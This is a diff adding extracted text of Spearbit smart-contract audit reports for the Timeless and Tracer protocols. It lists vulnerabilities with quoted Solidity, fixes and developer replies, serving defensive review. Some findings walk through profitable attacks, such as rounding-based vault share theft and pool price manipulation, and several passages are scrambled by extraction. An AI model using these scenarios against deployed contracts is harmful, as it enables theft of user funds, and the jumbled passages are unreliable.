The idea is to accrue yield for the mint recipient first, before increasing/reducing their balance, to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are minted to the Gate before its yield is accrued. Currently, the transfer from this to xPYT through the xPYT.deposit call accrues yield for this after the tokens have been minted to it (userPYTBalance * (updatedYieldPerToken - actualUserYieldPerToken) / PRECISION) and its balance increased. This leads to it receiving a larger yield amount than it should have. Recommendation: Accrue yield to the address receiving the minted tokens. // accrue yield to recipient // no need to do it if the recipient is msg.sender, since // we already accrued yield in _claimYield - if (pytRecipient != msg.sender) { + if (address(xPYT) != address(0) || pytRecipient != msg.sender) { _accrueYield( vault, pyt, - pytRecipient, + address(xPYT) == address(0) ? pytRecipient : address(this), updatedPricePerVaultShare ); } // mint NYTs and PYTs yieldTokenTotalSupply[vault] += yieldAmount; nyt.gateMint(nytRecipient, yieldAmount); if (address(xPYT) == address(0)) { // mint raw PYT to recipient pyt.gateMint(pytRecipient, yieldAmount); } else { // mint PYT and wrap in xPYT pyt.gateMint(address(this), yieldAmount); if (pyt.allowance(address(this), address(xPYT)) < yieldAmount) { // set PYT approval pyt.approve(address(xPYT), type(uint256).max); } xPYT.deposit(yieldAmount, pytRecipient); } Timeless: Yes, if we use sweep below we can accrue yield in the same way as in _enter. Fix implemented in PR #5. Spearbit: Acknowledged. 5.3 Medium Risk
+5.3.1 Swapper left-over token balances can be stolen Severity: Medium Risk Context: Swapper.sol#L133, UniswapV3Swapper.sol#L187 Description: The Swapper contract may never have any left-over token balances after performing a swap, because token balances can be stolen by anyone in several ways: • By using Swapper.doZeroExSwap with useSwapperBalance and tokenOut = tokenToSteal. • Arbitrary token approvals to arbitrary spenders can be set on behalf of the Swapper contract using UniswapV3Swapper.swapUnderlyingToXpyt. Recommendation: All transactions must atomically move all tokens in and out of the contract when performing swaps, to not leave any left-over token balances or be susceptible to front-running attacks. Timeless: Acknowledged, this is the intended way to use Swapper, it should not hold any tokens before and after a transaction.
+5.3.2 TickMath might revert in solidity version 0.8 Severity: Medium Risk Context: TickMath.sol#L2 Description: UniswapV3's TickMath library was changed to allow compilation with solidity version 0.8. However, adjustments to account for the implicit overflow behavior that the contract relies upon were not performed. UniswapV3xPYT.sol is compiled with version 0.8 and indirectly uses this library through the OracleLibrary. In the worst case, it could be that the library always reverts (instead of overflowing as in previous versions), leading to a broken xPYT contract. The same adjustments (pragma solidity >=0.5.0; instead of pragma solidity >=0.5.0 <0.8.0;) have been made for the OracleLibrary and PoolAddress contracts. However, their code does not rely on implicit overflow behavior. Recommendation: Follow the implementation of the official TickMath 0.8 branch which uses unchecked blocks for every function. Consider using the official Uniswap files with two different versions of this file, one for solidity versions <0.8 and one for 0.8 from the 0.8 branch.
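To illustrate the unchecked pattern used by the official TickMath 0.8 branch referenced in 5.3.2 above, here is a minimal sketch (the function is illustrative, not actual TickMath code): in Solidity 0.8+ arithmetic reverts on overflow by default, so code that intentionally relies on wrapping must opt out explicitly:

// SPDX-License-Identifier: GPL-2.0-or-later
pragma solidity ^0.8.0;

library WrappingMathSketch {
    // Pre-0.8 compilers let this silently wrap modulo 2**256; under 0.8+
    // the unchecked block restores that wrapping behavior instead of
    // reverting on overflow.
    function addWrapping(uint256 a, uint256 b) internal pure returns (uint256 c) {
        unchecked {
            c = a + b;
        }
    }
}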
Timeless: Implemented in PR #3. Spearbit: Acknowledged.
+5.3.3 Rounding issues when exiting a vault through shares Severity: Medium Risk Context: Gate.sol#L383 Description: When exiting a vault through Gate.exitToVaultShares, the user specifies a vaultSharesAmount. The amount of PYT&NYT to burn is determined by a burnAmount = _vaultSharesAmountToUnderlyingAmount(vaultSharesAmount) call. All implementations of this function in the derived YearnGate and ERC4626 contracts round down the burnAmount. This means one needs to burn fewer tokens than the value of the received vault shares. This attack can be profitable and lead to all vault shares being stolen if the gas costs of this attack are low. This can be the case with vault & underlying tokens with a low number of decimals, highly valuable shares, or cheap gas costs. Consider the following scenario: • Imagine the following vault assets: totalAssets = 1.9M, supply = 1M. Therefore, 1 share is theoretically worth 1.9 underlying. • Call enterWithUnderlying(underlyingAmount = 1900) to mint 1900 PYT/NYT (and the gate receives 1900 * supply / totalAssets = 1000 vault shares). • Call exitToVaultShares(vaultSharesAmount = 1), then burnAmount = shares.mulDivDown(totalAssets(), supply) = 1 * totalAssets / supply = 1. This burns 1 "underlying" (actually PYT/NYT but they are 1-to-1), but receives 1 vault share (worth 1.9 underlying). Repeat this for up to the minted 1900 PYT/NYT. • One can redeem the 1900 vault shares for 3610 underlying directly at the vault, making a profit of 3610 - 1900 = 1710 underlying. Recommendation: The _vaultSharesAmountToUnderlyingAmount function should be replaced by a _vaultSharesAmountToUnderlyingAmountUp function which rounds up, to avoid users profiting from receiving more value in vault shares than they burn in underlying. Timeless: Implemented in PR #5. Spearbit: Acknowledged. 5.4 Low Risk
+5.4.1 Possible outstanding allowances from Gate Severity: Low Risk Context: Gate.sol#L216 Description: The vault parameter of Gate.enterWithUnderlying can be chosen by an attacker in such a way that underlying = vault.asset() is another vault token of the Gate itself. The subsequent _depositIntoVault(underlying, underlyingAmount, vault) call will approve underlyingAmount of underlying tokens to the provided vault and could in theory allow stealing from other vault shares. This is currently only exploitable in very rare cases, because the caller also has to transfer the underlyingAmount to the gate contract first. For example, when transferring underlyingAmount = type(uint256).max is possible due to flashloans/flashmints and the vault shares implement approvals in a way that does not decrease anymore if the allowance is type(uint256).max, as is the case with ERC4626 vaults. Recommendation: As a best practice, consider resetting the approvals to zero after the vault.deposit call (as it is assumed to consume the allowance) to make sure that after the transaction ran, there are never any outstanding approvals on arbitrary token contracts from the gate to arbitrary spenders. This mitigates other unknown attack vectors. Timeless: Implemented in PR #8. Spearbit: Acknowledged.
+5.4.2 Factory.sol owner can change fees unexpectedly Severity: Low Risk Context: Factory.sol#L141 Description: The Factory.sol owner may be able to front-run yield calculations in a gate implementation and change user fees unexpectedly. Recommendation: Put a time lock in place for any fee changes made by the factory owner. Timeless: Acknowledged, we're fine with this as the Factory is planned to be owned by a Governor contract that already has built-in timelock mechanics.
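For finding 5.3.3 above, a minimal sketch of the round-up conversion, using solmate's FixedPointMathLib (function and variable names are illustrative; the actual Gate implementations may differ):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

import {FixedPointMathLib} from "solmate/utils/FixedPointMathLib.sol";

contract RoundingUpSketch {
    using FixedPointMathLib for uint256;

    uint256 internal totalAssets; // underlying tokens held by the vault
    uint256 internal totalSupply; // vault shares outstanding

    // Rounds the burn amount up, so an exiting user can never receive
    // more value in vault shares than they burn in PYT/NYT.
    function _vaultSharesAmountToUnderlyingAmountUp(uint256 shares) internal view returns (uint256) {
        return shares.mulDivUp(totalAssets, totalSupply);
    }
}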
Timeless: Acknowledged, we’re fine with this as the Factory is planned to be owned by a Governor contract that already has built in timelock mechanics. 8 +5.4.3 Low uniswapV3TwapSecondsAgo may result in AMM manipulation in pound() Severity: Low Risk Context: UniswapV3xPYT.sol#L98 Description: The lower the value of uniswapV3TwapSecondsAgo is set with at construction creation time the easier It becomes easier for attackers to it becomes for an attacker to manipulate the results of the pound() function. manipulate automated market maker price feeds with a lower time horizon, requiring less capital to manipulate prices, although users may simply not use an xPYT contract that sets uniswapV3TwapSecondsAgo too low. Recommendation: Add a lower bound for uniswapV3TwapSecondsAgo in the constructor. Timeless: We’re fine with this, since xPYT creation is permissionless users will just choose xPYTs with security parameters they’re comfortable with. +5.4.4 UniswapV3Swapper uses wrong allowance check Severity: Low Risk Context: UniswapV3Swapper.sol#L282, UniswapV3Swapper.sol#L373 Description: Before the UniswapV3Swapper can exit a gate, it needs to set an XPYT allowance to the gate. The following check determines if an approval needs to be set: if ( args.xPYT.allowance(address(this), address(args.gate)) < tokenAmountOut ) { args.xPYT.safeApprove(address(args.gate), type(uint256).max); } args.gate.exitToUnderlying( args.recipient, args.vault, args.xPYT, tokenAmountOut ); The tokenAmountOut is in an underlying token amount but A legitimate gate.exitToUnderlying address(swapper)) checks allowance[swapper][gate] >= previewWithdraw(tokenAmountOut). is compared against an xPYT shares amount. xPYT.withdraw(tokenAmountOut, address(gate), call will call Recommendation: In practice the actual value does not matter as there is either no approval set, or an infi- nite approval. We still recommend replacing the incorrect code with a comparison against the xPYT-converted tokenAmountOut for correctness: - if (args.xPYT.allowance(address(this), address(args.gate)) < tokenAmountOut) + if (args.xPYT.allowance(address(this), address(args.gate)) < ,! args.xPYT.previewWithdraw(tokenAmountOut)) Timeless: Implemented in PR #2. Spearbit: Acknowledged. 9 +5.4.5 Missing check that tokenIn and tokenOut are different Severity: Low Risk Context: Swapper.sol#L133 Description: The doZeroExSwap() function takes in two ERC20 addresses which are tokenIn and tokenOut. The problem is that the doZeroExSwap() function does not check if the two token addresses are different from one another. Adding this check can reduce possible attack vectors. Recommendation: Consider implementing the following check. require(tokenIn != tokenOut, "Duplicate tokens"); Timeless: Implemented in PR #1. Spearbit: Acknowledged. +5.4.6 Gate.sol gives unlimitted ERC20 approval on pyt for arbitrary address Severity: Low Risk Context: Gate.sol#L675 if (address(xPYT) == address(0)) { // mint raw PYT to recipient pyt.gateMint(pytRecipient, yieldAmount); } else { // mint PYT and wrap in xPYT pyt.gateMint(address(this), yieldAmount); if (pyt.allowance(address(this), address(xPYT)) < yieldAmount) { // set PYT approval pyt.approve(address(xPYT), type(uint256).max); } xPYT.deposit(yieldAmount, pytRecipient); } Description: A malicious contract may be passed into the claimYieldAndEnter() function as xPYT and given full control over any PYT the contract may ever hold. 
Even though PYT is validated to be a real PYT contract and the Gate.sol contract isn't expected to have any PYT in it, it would be safer to remove any unnecessary approvals. Recommendation: Avoid setting any approvals at all by using gateMint & sweep as _enter does. Timeless: Forgot to use sweep for this part. Implemented in PR #5. Spearbit: Acknowledged.
+5.4.7 Constructor function does not check for zero address Severity: Low Risk Context: UniswapV3Juggler.sol#L81-L84 Description: The constructor function does not check if the addresses passed in are zero addresses. This check can guard against errors during deployment of the contract. Recommendation: Require checks should be added to ensure that the addresses passed into the constructor function are not zero addresses. constructor(address factory_, IQuoter quoter_) { require(factory_ != address(0), "Zero address"); require(quoter_ != address(0), "Zero address"); factory = factory_; quoter = quoter_; } Also see: • xPYTFactory.sol#L20-L23 • UniswapV3xPYT.sol#L82-L83 • UniswapV3Swapper.sol#L70-L74 • Swapper.sol#L76-L78 • Factory.sol#L52 • Gate.sol#L158-L160 • NegativeYieldToken.sol#L15 • PerpetualYieldToken.sol#L15 Timeless: Acknowledged, we're fine with this.
+5.4.8 Accruing yield to msg.sender is not required when minting to xPYT contract Severity: Low Risk Context: Gate.sol#L1009 Description: The _exit function always accrues yield to the msg.sender before burning new tokens. The idea is to accrue yield for the recipient first, before increasing/reducing their balance, to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are burned on the Gate and not msg.sender. Recommendation: For correctness & potential gas efficiency reasons, only accrue the yield of the account whose tokens are being burned. That's _accrueYield(msg.sender) in case of address(xPYT) == address(0), and this otherwise.
Recommendation: Increase compiler version for the affected contracts and lock it. This has the added benefit of more free safety checks and optimizations by done the compiler. Note: Verify that changing the compiler does not break anything. Timeless: Implemented in PR #10. Spearbit: Acknowledged. 12 +5.5.2 No safeCast in UniswapV3Swapper’s _swap. Severity: Informational Context: UniswapV3Swapper.sol#L475 Description: It should be noted that solidity version ˆ0.8.0 doesn’t revert on overflow when type-casting. For example, if you tried casting the value 129 from uint8 to int8, it would overflow to -127 instead. This is because signed integers have a lower positive integer range compared to unsigned integers i.e -128 to 127 for int8 versus 0 to 255 for uint8. Recommendation: It is highly unlikely that this could become a problem in the mentioned context, however, we still recommend using SafeCastLib for this. Timeless: Implemented in PR #3. Spearbit: Acknowledged. +5.5.3 One step critical address change Severity: Informational Context: Ownable.sol#L37-40 Description: Setting the owner in Ownable is a one-step transaction. This situation enables the scenario of contract functionality becoming inaccessible or making it so a malicious address that was accidentally set as owner could compromise the system. Recommendation: Consider making the change of owner in the contracts a two-step process where the first trans- action (from the old/current address) registers the new address (i.e. grants ownership) and the second transaction (from the new address) claims the elevation of privileges. Timeless: Implemented in PR #11. Spearbit: Acknowledged. +5.5.4 Missing zero address checks in transfer and transferFrom functions. Severity: Informational Context: ERC20.sol#84-100 Description: The codebase uses solmate’s ERC-20 implementation. It should be noted that this library sacrifices user safety for gas optimization. As a result, their ERC-20 implementation doesn’t include zero address checks on transfer and transferFrom functions. Recommendation: Consider modifying ERC20.sol to include the missing checks. Alternatively, make it very clear to users that these controls aren’t in place, and transferring their tokens to the zero address will effectively burn them. Timeless: Acknowledged, we’re fine with this. 13 +5.5.5 Should add indexed keyword to deployed xPYT event Severity: Informational Context: xPYTFactory.sol#L15 Description: The DeployXPYT event only has the ERC20 asset_ marked as indexed while xPYT deployed can also have the indexed key word since you can use up to three per event and it will make it easier for bots to interact off chain with the protocol. Recommendation: - + event DeployXPYT(ERC20 indexed asset_, xPYT deployed); event DeployXPYT(ERC20 indexed asset_, xPYT indexed deployed); Timeless: Acknowledged, we’re fine with this +5.5.6 Missing check that tokenAmountIn is larger than zero Severity: Informational Context: Swapper.sol#L135 Description: In doZeroExSwap() there is no check that the tokenAmountIn number is larger than zero. Adding this check can add more thorough validation within the function. Recommendation: Consider implementing the code snippet below. require(tokenAmountIn > 0, "Cannot be zero"); Also, see UniswapV3xPYT.sol#L149. 
Timeless: Acknowledged, we’re fine with this +5.5.7 ERC20 does not emit Approval event in transferFrom Severity: Informational Context: ERC20.sol#L110 Description: The ERC20 contract does not emit new Approval events with the updated allowance in transferFrom. This makes it impossible to track approvals solely by looking at Approval events. Recommendation: Consider adding Approval events to the transferFrom function. Timeless: Why would you track approvals using events instead of just calling allowance()? Spearbit: Events can be indexed off-chain once and put into a database which is then queried for performance vs always querying an RPC node for the current allowance. As allowance is a mapping, you don’t know the keys if you want to list all approvals and therefore cannot call allowance(). But one could also argue if you really wanted to index approvals, you can also get this data some other way without events using the graph etc. It’s a difference between solmate and OpenZeppelin’s ERC20 implementations but ERC20 does indeed not require it. Timeless: Acknowledged, we’re fine with this. 14 +5.5.8 Use the official UniswapV3 0.8 branch Severity: Informational Context: FullMath.sol Description: The current repositories create local copies of UniswapV3’s codebase and manually migrate the contracts to Solidity 0.8. • For FullMath.sol this also leads to some small gas optimizations in this LOC as it uses 0 instead of type(uint256).max + 1. Recommendation: Consider using the official Uniswap V3 0.8 branch to make it easier to spot differences in the original code. Timeless: Implemented in PR #9. Spearbit: Acknowledged. The code has been modified to match the official library. The official library has not been added as a dependency. +5.5.9 No checks that provided xPYT matches PYT of the provided vault Severity: Informational Context: Gate.sol#L180-L181 Description: The Gate contracts has many functions that allow specifying vault and a xPYT addresses as pa- rameter. The underlying of the xPYT address is assumed to be the same as the vault’s PYT but this check is not enforced. Users that call the Gate functions with an xPYT contract for the wrong vault could see their de- posit/withdrawals lost. Recommendation: Consider adding a check to the functions in Gate as a safety check. require(address(xPYT) == address(0) || xPYT.asset() == getPerpetualYieldTokenForVault(vault), "xPYT is ,! for a different PYT than vault"); Timeless: Acknowledged, won’t fix since we expect users to make this check offchain and not making the check saves gas. +5.5.10 Protocol does not work with non-standard ERC20 tokens Severity: Informational Context: Gate.sol#L216 Description: Some ERC20 tokens make modifications to their ERC20’s transfer or balanceOf functions. One kind include deflationary tokens that charge certain fee for every transfer or transferFrom. Others are rebasing tokens that increase in balance over time. Using these tokens in the protocol can lead to issues such as: • Entering a vault through the Gate will not work as it tries to deposit the pre-fee amount instead of the received post-fee amount. • The UniswapV3Swapper tries to enter a vault with the pre-fee transfer amount. Recommendation: Clarify if fee-on-transfer tokens and other non-standard ERC20 tokens should be supported. Timeless: We don’t need to support fee-on-transfer tokens. 
15 diff --git a/findings_newupdate/spearbit/Tracer-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Tracer-Spearbit-Security-Review.txt new file mode 100644 index 0000000..362f8c8 --- /dev/null +++ b/findings_newupdate/spearbit/Tracer-Spearbit-Security-Review.txt @@ -0,0 +1,51 @@ +5.1.1 Pool token price is incorrect when there is more than one pending upkeep Severity: Critical Context: PoolCommitter.sol#L384-391 Description: The amount of pool tokens to mint and quote tokens to burn is determined by the pool token price. This price, for a commit at update interval ID X, should not be influenced by any pending commits for IDs greater than X. However, in the current implementation price includes the current total supply but burn commits burn pool tokens immediately when commit() is called, not when upkeep() is executed. // pool token price computation at execution of updateIntervalId, example for long price priceHistory[updateIntervalId].longPrice = longBalance / (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[updateIntervalId].longBurnAmount + _totalCommit[updateIntervalId].longBurnShortMintAmount) ,! The implementation tries to fix this by adding back all tokens burned at this updateIntervalId but it must also add back all tokens that were burned in future commits (i.e. when ID > updateIntervalID). This issue allows an attacker to get a better pool token price and steal pool token funds. Example: Given the preconditions: • long.totalSupply() = 2000 • User owns 1000 long pool tokens • lastPriceTimestamp = 100 • updateInterval = 10 • frontRunningInterval = 5 At time 104: User commits to BurnLong 500 tokens in appropriateUpdateIntervalId = 5. Upon execution user receives a long price of longBalance / (1500 + 500) if no further future commitments are made. Then, as tokens are burned totalPoolCommitments[5].longBurnAmount = 500 and long.totalSupply -= 500. time 106: At 6 as they are now past totalPoolCommitments[6].longBurnAmount = 500, long.totalSupply -= 500 again as tokens are burned. User commits another 500 tokens to BurnLong at appropriateUpdateIntervalId = Now the frontRunningInterval and are scheduled for the next update. the 5th update interval Finally, (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[5].longBurnAmount + _totalCom- mit[5].longBurnShortMintAmount = longBalance / (1000 + 500) which is a better price than what the user should have received. ID is executed by the pool keeper but at longPrice = longBalance / With a longBalance of 2000, the user receives 500 * (2000 / 1500) = 666.67 tokens executing the first burn commit and 500 * ((2000 - 666.67) / 1500) = 444.43 tokens executing the second one. 5 The total pool balance received by the user is 1111.1/2000 = 55.555% by burning only 1000 / 2000 = 50% of the pool token supply. Recommendation: Pool price computation should take into account all tokens that have been burned, not only the tokens that have been burned in the updateIntervalID of the commit. Note that there can be many pending total commits if frontRunningInterval > updateInterval. Tracer: Valid. Fixed in commit 669a61a. Spearbit: Acknowledged. 5.2 High Risk +5.2.1 No price scaling in SMAOracle Severity: High Risk Context: SMAOracle.sol#L82-L96, ChainlinkOracleWrapper.sol#L36-L60 Description: The update() function of the SMAOracle contract doesn’t scale the latestPrice although a scaler is set in the constructor. On the other hand, the _latestRoundData() function of ChainlinkOracleWrapper contract does scale via toWad(). 
contract SMAOracle is IOracleWrapper { constructor(..., uint256 _spotDecimals, ...) { ... require(_spotDecimals <= MAX_DECIMALS, "SMA: Decimal precision too high"); ... /* `scaler` is always <= 10^18 and >= 1 so this cast is safe */ scaler = int256(10**(MAX_DECIMALS - _spotDecimals)); ... } function update() internal returns (int256) { /* query the underlying spot price oracle */ IOracleWrapper spotOracle = IOracleWrapper(oracle); int256 latestPrice = spotOracle.getPrice(); ... priceObserver.add(latestPrice); // doesn't scale latestPrice ... } contract ChainlinkOracleWrapper is IOracleWrapper { function getPrice() external view override returns (int256) { (int256 _price, ) = _latestRoundData(); return _price; } function _latestRoundData() internal view returns (int256, uint80) { (..., int256 price, ..) = AggregatorV2V3Interface(oracle).latestRoundData(); ... return (toWad(price), ...); } Recommendation: The latestPrice variable in SMAOracle contract should be scaled, and the toWad() function should be re-introduced. Note: If the SMAOracle is only used with WAD based spot oracles, then _spotDecimals == 18 must be enforced. Tracer: We are submitting PR 406 as a mitigation for this. It is a slightly larger PR than we originally intended so as a result it will likely be submitted for several defects here. We would appreciate if each defect could be assessed against it. Spearbit: Acknowledged. 6 +5.2.2 Two different invariantCheck variables used in PoolFactory.deployPool() Severity: High Risk Context: PoolFactory.sol#L93-L174, IPoolFactory.sol#L14 Description: The deployPool() function in the PoolFactory contract uses two different invariantCheck vari- ables: the one defined as a contract’s instance variable and the one supplied as a parameter. Note: This was also documented in Secureum’s CARE-X report issue "Invariant check incorrectly fixed". function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... poolCommitter.initialize(..., ,! invariantCheck deploymentParameters.invariantCheck, ... ); // version 1 of ... ILeveragedPool.Initialization memory initialization = ILeveragedPool.Initialization({ ... _invariantCheckContract: invariantCheck, // version 2 of invariantCheck ... }); Recommendation: The code should be changed to: function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... poolCommitter.initialize(..., poolCommitter.initialize(..., deploymentParameters.invariantCheck, ... ); invariantCheck, ... ); - + } In addition, the invariantCheck member of struct PoolDeployment in IPoolFactory.sol should be removed to prevent mistakes. Tracer: Valid. Fixed as part of CARE-X commit 98c76bf Spearbit: Acknowledged. +5.2.3 Duplicate user payments for long commits when paid from balance Severity: High Risk Context: PoolCommitter.sol#L299-L306 Description: When minting pool tokens in commit(), the fromAggregateBalance parameter indicates if the user wants to pay from their internal balances or by transferring the tokens. The second if condition is wrong and leads to users having to pay twice when calling commit() with CommitType.LongMint and fromAggregateBalance = true. Recommendation: The second if condition should be changed to only perform the transfer for pool token mints if they have not been already paid from internal balances. -if (commitType == CommitType.LongMint || (commitType == CommitType.ShortMint && !fromAggregateBalance)) { ,! 
+if ((commitType == CommitType.LongMint || commitType == CommitType.ShortMint) && !fromAggregateBalance) { // minting: pull in the quote token from the committer // Do not need to transfer if minting using aggregate balance tokens, since the leveraged pool already owns these tokens. ,! pool.quoteTokenTransferFrom(msg.sender, leveragedPool, amount); ,! } Tracer: Already fixed in commit 4f2d38f 7 Spearbit: Previously the token transfer was done after the applyCommitment() probably to avoid re-entrancy issues. This behavior is different for non-ERC20 tokens such as ERC777 tokens that give control to the sender and recipient. Is the system intended to support these other token standards? Other than that, it is a valid fix. Tracer: Our system only needs to support ERC20 tokens and our threat model encompasses this invariant. Spearbit: Acknowledged. +5.2.4 Initial executionPrice is too high Severity: High Risk Context: PoolKeeper.sol#L73 Description: When a pool is deployed the initial executionPrice is calculated as firstPrice * 1e18 where firstPrice is ILeveragedPool(_poolAddress).getOraclePrice(): contract PoolKeeper is IPoolKeeper, Ownable { function newPool(address _poolAddress) external override onlyFactory { int256 firstPrice = ILeveragedPool(_poolAddress).getOraclePrice(); int256 startingPrice = ABDKMathQuad.toInt(ABDKMathQuad.mul(ABDKMathQuad.fromInt(firstPrice), ,! FIXED_POINT)); executionPrice[_poolAddress] = startingPrice; } } All other updates to executionPrice use the result of getPriceAndMetadata() directly without scaling: function performUpkeepSinglePool() { ... (int256 latestPrice, ...) = pool.getUpkeepInformation(); ... executionPrice[_pool] = latestPrice; ... } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function getUpkeepInformation() { (int256 _latestPrice, ...) = IOracleWrapper(oracleWrapper).getPriceAndMetadata(); return (_latestPrice, ...); } } The price after the firstPrice will always be lower, therefore its funding rate payment will always go to the shorts and long pool token holders will incur a loss. Recommendation: The 1e18 scaling should be removed for the initial executionPrice - int256 startingPrice = ABDKMathQuad.toInt(ABDKMathQuad.mul(ABDKMathQuad.fromInt(firstPrice), FIXED_POINT)); ,! + int256 startingPrice = firstPrice; Tracer: Valid. Fixed in commit 445377f. Spearbit: Acknowledged. 8 +5.2.5 Paused state can’t be set and therefore withdrawQuote() can’t be executed Severity: High Risk Context: InvariantCheck, LeveragedPool, PoolCommitter Description: The checkInvariants() function of the InvariantCheck contract is called via the modifiers check- InvariantsBeforeFunction() and checkInvariantsAfterFunction() of both LeveragedPool and PoolCommit- ter contracts, and it is meant to pause the contracts if the invariant checks don’t hold. The aforementioned modifiers also contain the require(!paused, "Pool is paused"); statement, which reverts the entire transaction and resets the paused variable that was just set. Furthermore, the paused state can only be set by the InvariantCheck contract due to the onlyInvariantCheck- Contract modifier. Thus the paused variable will never be set to true, making withdrawQuote() impossible to be executed because it requires the contract to be paused. This means that the quote tokens will always stay in the pool even if invariants don’t hold and all other actions are blocked. Relevant parts of the code: The checkInvariants() function calls InvariantCheck.pause() if the invariants don’t hold. 
The latter calls pause() in LeveragedPool and PoolCommitter: contract InvariantCheck is IInvariantCheck { function checkInvariants(address poolToCheck) external override { ... pause(IPausable(poolToCheck), IPausable(address(poolCommitter))); ... } function pause(IPausable pool, IPausable poolCommitter) internal { pool.pause(); poolCommitter.pause(); } } In LeveragedPool and PoolCommitter contracts, the checkInvariantsBeforeFunction() and checkIn- variantsAfterFunction() modifiers will make the transaction revert if checkInvariants() sets the paused state. contract LeveragedPool is ILeveragedPool, Initializable, IPausable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, "Pool is paused"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, "Pool is paused"); _; invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, "Pool is paused"); // will reset pause again } function pause() external override onlyInvariantCheckContract { // can only called from InvariantCheck paused = true; emit Paused(); } ,! } 9 contract PoolCommitter is IPoolCommitter, Initializable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, "Pool is paused"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, "Pool is paused"); _; invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, "Pool is paused"); // will reset pause again } function pause() external onlyInvariantCheckContract { // can only called from InvariantCheck paused = true; emit Paused(); } Recommendation: This issue is also discussed in modifiers-undermine-contract-pausing and there are a few reasons to reconsider fixing it: • When a transaction triggers an invariant check and it is rolled back due to the revert, other transactions might still be executed. With a paused state this wouldn’t happen. • Pause functionality that doesn’t work is misleading for developers and code reviewers. It is better to delete the dead code, which also saves gas. • withdrawQuote() cannot be executed since the pause state is unreachable. If it is preferable to use the pause functionality, it can be done by having a surrounding contract which stores the pause state and calls the underlying logic with a try mechanism. The underlying logic can then be reverted while the surrounding contract keeps the paused state. Here is an implementation example of a surrounding contract that handles the revert and sets the pause variable. The code that checks the invariants reverts with the InvariantsFail() custom error, which is caught by the try/catch block in the caller and the paused state is set. 
10 //SPDX-License-Identifier: MIT pragma solidity 0.8.11; import "hardhat/console.sol"; contract Pool { error InvariantsFail(); function DoSomething() public pure { revert InvariantsFail(); } } contract InvariantCheck { Pool myPool = new Pool(); bool pause; function TryDoSomething() public returns (string memory) { try myPool.DoSomething() catch Error(string memory reason) { return reason; } catch Panic(uint) catch (bytes memory reason) { { return "Ok"; } { return "Panic"; } if (bytes4(reason) == bytes4(abi.encodeWithSignature("InvariantsFail()"))) { pause = true; return("InvariantsFail"); } return "Unknown"; } } constructor() { console.log("Pause =",pause); console.log(TryDoSomething()); console.log("Pause =",pause); } } Note: Beware that this does not interfere with any other functionality. ETH has to be sent back to the caller as this will not be automatically reverted. Tracer: We decided to change how invariant checking works. Instead of checking the invariants on every function call, we now have a contract which can be called at any time by an EOA to do the same invariant checks/pausing. This obviously does not have the same invariant guarantees, as it requires an EOA to start a TX to detect invariant violations, but we decided to make the tradeoff anyway. However, it does mean that this issue should not be relevant anymore, because the paused state can in fact be set. Addressed in PR 384. Spearbit: Acknowledged. 11 5.3 Medium Risk +5.3.1 The value of lastExecutionPrice fails to update if pool.poolUpkeep() reverts Severity: Medium Risk Context: PoolKeeper.sol#L119-L161 Description: The performUpkeepSinglePool() function of the PoolKeeper contract updates executionPrice[] with the latest price and calls pool.poolUpkeep() to process the price difference. However, pool.poolUpkeep() can revert, for example due to the checkInvariantsBeforeFunction modifier in mintTokens(). If pool.poolUpkeep() reverts then the previous price value is lost and the processing will not be accurate. There- fore, it is safer to store the new price only if pool.poolUpkeep() has been executed succesfully. function performUpkeepSinglePool(...) public override { ... int256 lastExecutionPrice = executionPrice[_pool]; executionPrice[_pool] = latestPrice; ... try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) { // previous price can get lost if poolUpkeep() reverts ... // executionPrice[_pool] should be updated here } catch Error(string memory reason) { ... } } Recommendation: To prevent losing the latestPrice value, the executionPrice[_pool] variable should be updated only if poolUpkeep() doesn’t revert. function performUpkeepSinglePool(...) public override { - + ... int256 lastExecutionPrice = executionPrice[_pool]; executionPrice[_pool] = latestPrice; ... try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) { executionPrice[_pool] = latestPrice; ... } catch Error(string memory reason) { ... } } Alternatively, the administration of the executionPrices could be done within the called poolUpkeep() function of the LeveragedPool contract. Tracer: Valid, fixed in PR 327. Spearbit: Acknowledged. 12 +5.3.2 Pools can be deployed with malicious or incorrect quote tokens and oracles Severity: Medium Risk Context: PoolFactory.sol#L93-L174 Description: The deployment of a pool via deployPool() is permissionless. 
The deployer provides several pa- rameters that have to be trusted by the users of a specific pool, these parameters include: • oracleWrapper • settlementEthOracle • quoteToken • invariantCheck If any one of them is malicious, then the pool and its value will be affected. Note: Separate findings are made for the deployer check (issue Authenticity check for oracles is not effective) and the invariantCheck (issue Two different invariantCheck variables used in PoolFactory.deployPool() ). Recommendation: Although this is a general risk with permissionless protocols, it is possible to add extra controls (such as allowlists) on quote tokens and the corresponding settlementEthOracle oracle. An additional benefit of allowlisting quote tokens and corresponding oracles is that the oracles could be shared, thus saving gas. Tracer: As decided by the core Tracer team, no allowlists are going to be added. We do agree, though, that there is a risk. To address it without impinging on any degree of permissionlessness, the DAO will be carrying out security checks to give a safety score (akin to Rari protocol’s security checks). Spearbit: Acknowledged. +5.3.3 pairTokenBase and poolBase template contracts instances are not initialized Severity: Medium Risk Context: LeveragedPool.sol#L90-L133 PoolFactory.sol#L66-L81, PoolToken.sol#L9-L14, ERC20_Cloneable.sol#L33-L72, Description: The constructor of PoolFactory contract creates three template contract instances but only one is initialized: poolCommitterBase. The other two contract instances (pairTokenBase and poolBase) are not initial- ized. contract PoolFactory is IPoolFactory, Ownable { constructor(address _feeReceiver) { ... PoolToken pairTokenBase = new PoolToken(DEFAULT_NUM_DECIMALS); // not initialized pairTokenBaseAddress = 